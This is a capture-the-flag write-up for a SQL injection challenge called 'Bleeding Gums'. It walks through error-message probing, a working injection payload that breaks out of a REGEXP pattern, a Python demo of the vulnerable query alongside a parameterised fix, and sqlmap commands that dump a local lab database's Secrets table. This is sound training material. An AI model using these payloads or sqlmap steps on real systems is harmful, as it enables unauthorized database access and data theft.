2019 Stonecutters - Bleeding Gums
In honor of Bleeding Gums Murphy, who passed away 24 years ago today, I thought it would be nice to pay tribute to him by publishing my write-up for the Stonecutters' "Bleeding Gums" challenge.
Bleeding Gums was an empty website aside from a single search field as seen below:
When I searched for the letter "a", I saw the table below:
When I searched for the letter "b", I saw a smaller data set returned and some of the artists were different.
Next, I searched for years and album titles, but the query only seemed to match on Artists.
Searching for ' gave me the following SQL error:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ')'' at line 1
I threw sqlmap at it but I wasn't able to get anything out of it. I then started to play with the injection manually.
With this particular challenge, I noticed that -- and # produced different error messages, because they cut the original statement off at different points. For example, ' OR 1=1 -- returned a blank page, but ' OR 1=1 # gave me this error:
Error: Got error 'missing ) at offset 4' from regexp
The pattern was obviously missing a ), which told me the search term lands inside a parenthesised REGEXP pattern, so I added a ) at various positions in the payload and kept the 1=1 test. I found that ")' or 1=1 # " returned the full table of Artists: the ) closes the regexp group, the ' closes the string literal, OR 1=1 makes the WHERE clause true for every row, and # discards the rest of the original query.
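To make the two error messages and the working payload concrete, here is an added example that is not part of the original write-up or the challenge code. The query shape it uses (the search term concatenated into a quoted, parenthesised REGEXP pattern) is an inference from the errors above, not the challenge's source. It stands in SQLite with a Python REGEXP shim for the MariaDB backend, so MySQL's # comment is replaced by "-- " (trailing space, which MySQL also honours), and the Albums rows are constructed. The hardened search shows the caveat a parameterised fix alone would miss: the term still controls a regular expression, so it must also be regex-escaped or an attacker can supply ".*" or an unbalanced ) and rewrite or break the pattern.

```python
import re
import sqlite3

# Constructed sample rows standing in for the challenge's Albums table.
SAMPLE_ROWS = [
    ("Bleeding Gums Murphy", "Sax on the Beach", 1989),
    ("Bart Simpson", "Do the Bartman", 1990),
    ("Lisa Simpson", "Baritone Sax", 1992),
    ("Apu Nahasapeemapetilon", "Be Sharps Live", 1993),
]


def _regexp(pattern, value):
    """REGEXP shim: MariaDB's REGEXP is case-insensitive by default and
    errors on a malformed pattern; Python's re behaves the same here."""
    return 1 if re.search(pattern, value, re.IGNORECASE) else 0


def make_db():
    """In-memory SQLite database playing the part of the MariaDB backend."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("REGEXP", 2, _regexp)  # x REGEXP y -> REGEXP(y, x)
    conn.execute("CREATE TABLE Albums (artist TEXT, album TEXT, year INTEGER)")
    conn.executemany("INSERT INTO Albums VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, term):
    """Assumed shape of the challenge's query (inferred from the error
    messages, not from its source): the term is concatenated into a
    quoted, parenthesised REGEXP pattern."""
    sql = f"SELECT artist, album, year FROM Albums WHERE artist REGEXP '({term})'"
    return conn.execute(sql).fetchall()


def search_fixed(conn, term):
    """Hardened version: bind the term as a parameter so it cannot leave
    the string literal, and escape regex metacharacters so it cannot
    rewrite the pattern either (binding alone would still let '.*' match
    everything or an unbalanced ')' break the regexp)."""
    sql = "SELECT artist, album, year FROM Albums WHERE artist REGEXP '(' || ? || ')'"
    return conn.execute(sql, (re.escape(term),)).fetchall()


def observe(conn, term):
    """What the attacker sees for one payload against the vulnerable query:
    'rows:N', 'sql_error' (string literal broken, like the page's first
    error) or 'regexp_error' (SQL parsed, but the pattern was left
    unbalanced, like the page's 'missing )' error)."""
    try:
        rows = search_vulnerable(conn, term)
    except sqlite3.OperationalError as exc:
        # sqlite3 reports an exception raised inside a UDF with this text.
        if "user-defined function" in str(exc):
            return "regexp_error"
        return "sql_error"
    return f"rows:{len(rows)}"


if __name__ == "__main__":
    db = make_db()
    # Walks the same probes as the write-up; SQLite lacks MySQL's '#'
    # comment, so '-- ' (trailing space, valid in MySQL too) ends the query.
    for payload in ["a", "b", "'", "' OR 1=1 -- ", ")' OR 1=1 -- ", ".*"]:
        print(f"{payload!r:20} vulnerable -> {observe(db, payload)}, "
              f"fixed -> rows:{len(search_fixed(db, payload))}")
```

Run stand-alone, the script prints one line per probe: the letters return subsets, a lone quote breaks the SQL, the "' OR 1=1 -- " variant parses but leaves the regexp with an unmatched "(", and ")' OR 1=1 -- " returns every row. Against search_fixed, each of the attack payloads is just a literal string that matches no artist.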
At this point I felt it was worth trying sqlmap again, this time telling it exactly where to inject: the * in --data is sqlmap's custom injection marker, so its payloads land between the )' that closes the regexp group and the string literal and the # that comments out the rest of the query. I always first confirm that sqlmap will work for my purposes with the --current-user option, as seen in my command below:
# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --current-user
This was successful and returned the following information:
<snip>
[21:57:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.3
back-end DBMS: MySQL >= 5.0
[21:57:32] [INFO] fetching current user
current user: 'ctf@localhost'
[21:57:32] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
<snip>
Next I ran sqlmap with -a (retrieve everything). No flag turned up in that output, or I overlooked it, but I did notice another database called "ctf". So I used sqlmap to step through which databases existed and which tables they held.
First, I used --dbs to show me the available databases:
# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --dbs
<snip>
[*] ctf
[*] information_schema
[*] test
<snip>
The ctf database stuck out, since this was after all a CTF, so I used sqlmap to list the tables in that database:
# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" --tables -D "ctf"
<snip>
Database: ctf
[2 tables]
+---------+
| Albums  |
| Secrets |
+---------+
<snip>
Secrets looked super interesting, so I dumped the entries of the "Secrets" table (without -D, sqlmap falls back to the web application's current database, which here was ctf):
# sqlmap -u "http://127.0.0.1:8080/index.php" --data="a=)'*%20#%20" -T "Secrets" --dump
Which presented me with the flag:
Database: ctf
Table: Secrets
[1 entry]
+---------------------------------+
| secret                          |
+---------------------------------+
| flag{SelmaSmokesJazzCigarettes} |
+---------------------------------+
Another fun SQLi challenge. sqlmap is such a powerful tool that it's easy to throw it at something and expect magic to happen. That's not always the case, so when you see errors, keep trying: the error messages themselves told me where the injection point sat, and once I handed sqlmap that position it did the rest.
RIP Bleeding Gums
-strupo_